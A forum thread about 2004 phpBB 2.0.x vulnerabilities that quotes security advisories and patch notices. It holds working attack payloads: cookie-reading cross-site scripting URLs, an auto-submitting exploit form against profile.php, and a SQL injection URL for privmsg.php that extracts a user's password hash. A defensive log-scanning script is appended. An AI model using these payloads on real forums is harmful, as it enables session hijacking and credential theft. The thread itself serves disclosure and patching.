# Software > Security > PhpBB

## Mick Flemm

http://www.awmn.gr/forum/viewtopic.php? ... 0%74%3E%3C

More information:


################################################
Advisory Name: New phpBB ViewTopic.php Cross Site Scripting Vulnerability
Release Date: Feb 29, 2004
Application: phpBB
Platform: PHP
Version Affected: the latest version
Vendor URL: http://www.phpbb.com/
Discoverer: Cheng Peng Su (apple_soup_at_msn.com)
################################################

Details:
This vuln is similar to Arab VieruZ's advisory 'XSS bug in phpBB'; this time the problem is not in 'highlight' but in 'postorder'. We can inject HTML code, and such code could be used to steal cookie information.

Proof of Concept:
If there is a topic at
http://site/phpBB/viewtopic.php?t=123456
this page can also be viewed at
http://site/phpBB/viewtopic.php?t=123456&postorder=asc
and then this page will contain code like the one below:
[Topic Title].
phpBB doesn't filter out illegal characters from 'postorder', so we can inject HTML code after 'postorder='.

----------


## paravoid

A minor bug...
Generally, XSS isn't something worth paying much attention to...
Come on, tell me: would you visit a link like that if someone you don't know sent it to you?

I would fix it, but the phpBB Team hasn't released a fix yet and I have no desire to patch it myself...

----------


## Achille

It would be good to fix it (keep the differences in a diff so you can apply the official patch later).

At a URL promising amazing patches, though, someone might well click.

----------


## Mick Flemm

Another XSS, and again sorry for the long post, but it has no URL...

Vendor : phpBB Group
URL : http://www.phpbb.com
Version : phpBB 2.0.6d and earlier
Risk : Cross Site Scripting

Problem:
phpBB is a great forum system used by many millions of people. It is one of the more secure of the forum systems, but has a few issues still present, both of which allow for XSS (Cross Site Scripting). This problem presents itself in two different places. One of these places is viewtopic.php and the other is viewforum.php. Below are examples along with a brief explanation on how to replicate this issue.

viewforum.php?f=[FNUM]&topicdays=[DNUM][XSS]

FNUM is a valid forum number. DNUM is the number of days to check. If you get no results with the number 1, for example, try the number 99 and so on. XSS is whatever code is injected.

viewtopic.php?t=[TNUM]&postdays=[DNUM][XSS]

This is nearly the same issue as above; it just happens to be present in multiple files. The only difference is that TNUM is a valid topic id number. Remember, the query must display results in order for the XSS to take place. Additionally, the offset (start) variable may be used to get results, but in most cases it is unnecessary. Examples are below though.


Examples:
viewforum.php?f=1&topicdays=99"><script>alert(document.cookie)</script>&start=30
viewtopic.php?t=10&postdays=99"><script>alert(document.cookie)</script>&start=20


Solution:
I have released a fix for this vulnerability. It requires a valid integer for the
affected variables, and thus eliminates this vulnerability from taking place. You
can find the fix by following the link below.

http://www.gulftech.org/vuln/phpBB2.0.6dfix.rar

The phpBB development team will be releasing an official fix soon. Please check their website, or the SourceForge project page of phpBB, for any updates. The SourceForge project page for phpBB can be located @ http://sourceforge.net/projects/phpbb The fix supplied here should suffice though. If you feel this is incorrect, please contact me with details of any problems you experience. And a big thanks to Meik Sievertsen and the rest of the phpBB team for addressing these issues in a very prompt and professional manner. Original advisory located @ http://www.gulftech.org/03122004.php



Credits:
Credits go to JeiAr of the GulfTech Security Research Team. 
http://www.gulftech.org

----------


## jimis

That's for the last one.

Just so I can say something too.

For the first one, did you patch it? Because it doesn't work for me.

And a question (don't beat me up, I'm a layman): how can someone exploit these with malicious intent? Because seeing your own cookies is pretty harmless.

Dimitris

P.S. It took a huge effort to get that quote mark into the link.

----------


## Mick Flemm

Have you open the link without noticing and read your cookie; then they can paste it as-is into Mozilla or IE and simply enter the site as you...

----------


## Mick Flemm

This one looks more serious....

http://www.gulftech.org/03202004.php

----------


## Mick Flemm

#####################################################################

Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
Release Date : Mar 21, 2004
Application : phpBB
Version : phpBB 2.0.6d or others?
Platform : PHP
Vendor URL : http://www.phpbb.com/
Author : Cheng Peng Su (apple_soup_at_msn.com)

#####################################################################

Proof of Concept:

This vuln is in profile.php. When you click [Show Gallery], phpBB will show you the Avatar gallery, asking you to choose one for yourself. The hole is in the form: after submitting, phpBB will use the value of "avatarselect" as the path of the gallery directly, without filtering any illegal characters.

Exploit:

exploit.htm:

```html
<form name='f' action="http://site/profile.php?mode=editprofile" method="post">
<input name="avatarselect" value='" ><script>alert(document.cookie)</script>'>
<input type="submit" name="submitavatar" value="Select avatar">
</form>
<script>
window.onload=function()
{
document.all.submitavatar.click();
}
</script>
```

Contact:

Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com

----------


## paravoid

Thanks, but http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=183098
As for 2.0.7 and 2.0.7a, don't worry, all applied.
You can't keep up with me.

----------


## Mick Flemm

Hey,

The below patch fixes the sql injection vulnerability
reported by Janek Vind "waraxe", in privmsg.php.


Also available from:
http://www.nettwerked.co.uk/code/privmsg-sqlinj.patch

It should be noted that, as Janek stated, this serious
SQL injection vulnerability exists in ALL versions of
phpBB2 - even the latest.

The patch is written for the latest version of phpBB2,
2.0.8, and it prevents the issue successfully.



Thank you for your time.
Shaun.

----------


## Mick Flemm

Hi guys,

After playing around with the private message SQL injection issue on a forum that I admin, I noticed that the exploit code posted in the author's post doesn't work correctly. Here is why:

Both the TO and FROM fields hold the username and MD5 hash in his exploit. The problem is that each field is only able to hold 25 bytes at most (at least on the forums I tested it on, they were all 2.0.…). Well, an MD5 hash is 32 bytes, so you may get what looks like a valid hash at first glance, but it doesn't work as it is an incomplete hash. Below is an example that stores the username in the SUBJECT of the PM and the MD5 hash in the BODY of the PM. It was tested on a few versions with working results. Of course the user_id=2 can be replaced with whatever user_id someone wants.

/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

Hope this helps

JeiAr

----------
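As an added illustration (not phpBB's code or any poster's code), a detection pass over constructed access-log lines that flags the request shapes quoted in the advisories above: non-integer values in the viewtopic/viewforum parameters that the GulfTech fix requires to be integers, an unexpected postorder value, and a client-supplied pm_sql_user as in the privmsg.php injection. The parameter names come from the URLs in the thread; the Apache combined log format is an assumption, and the profile.php avatarselect field travels in a POST body, so it is not visible here.

```python
"""Detection pass for the phpBB 2.0.x request patterns in this thread.
Added illustration, not phpBB's code or any poster's code; assumes Apache
combined-format access logs (request target in quotes after the timestamp)."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the quoted advisories say must be plain integers.
INT_PARAMS = {"t", "f", "p", "start", "postdays", "topicdays"}
POSTORDER_ALLOWED = {"asc", "desc"}
# Request target from an Apache combined log line: "GET /path?query HTTP/1.x".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def inspect_request(target: str) -> list[str]:
    """Return findings for one request target; an empty list means clean."""
    findings = []
    # parse_qs percent-decodes and splits each pair on the first '=' only,
    # so an injected value containing '=' or '/*' survives intact.
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in INT_PARAMS and not value.isdigit():
                findings.append(f"{name}: non-integer value {value!r}")
            elif name == "postorder" and value.lower() not in POSTORDER_ALLOWED:
                findings.append(f"postorder: unexpected value {value!r}")
            elif name == "pm_sql_user":
                # Supplied via the URL in the privmsg.php injection; no client needs it.
                findings.append("pm_sql_user supplied by client")
    return findings


def scan_log(lines: list[str]) -> list[tuple[str, str]]:
    """Return (target, finding) pairs for every finding raised across the log."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            hits.extend((m.group(1), f) for f in inspect_request(m.group(1)))
    return hits


# Constructed sample lines, not real traffic; payloads mirror the PoCs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Mar/2004:10:01:02 +0200] "GET /phpBB/viewtopic.php?t=123456&postorder=asc HTTP/1.1" 200 8123',
    '10.0.0.5 - - [15/Mar/2004:10:02:10 +0200] "GET /phpBB/viewforum.php?f=1&topicdays=99%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&start=30 HTTP/1.1" 200 7410',
    '10.0.0.9 - - [15/Mar/2004:10:03:44 +0200] "GET /phpBB/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,user_password%20FROM%20phpbb_users%20LIMIT%201/* HTTP/1.1" 200 5102',
]

if __name__ == "__main__":
    for target, finding in scan_log(SAMPLE_LOG):
        print(f"{finding:40s} <- {target}")
```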

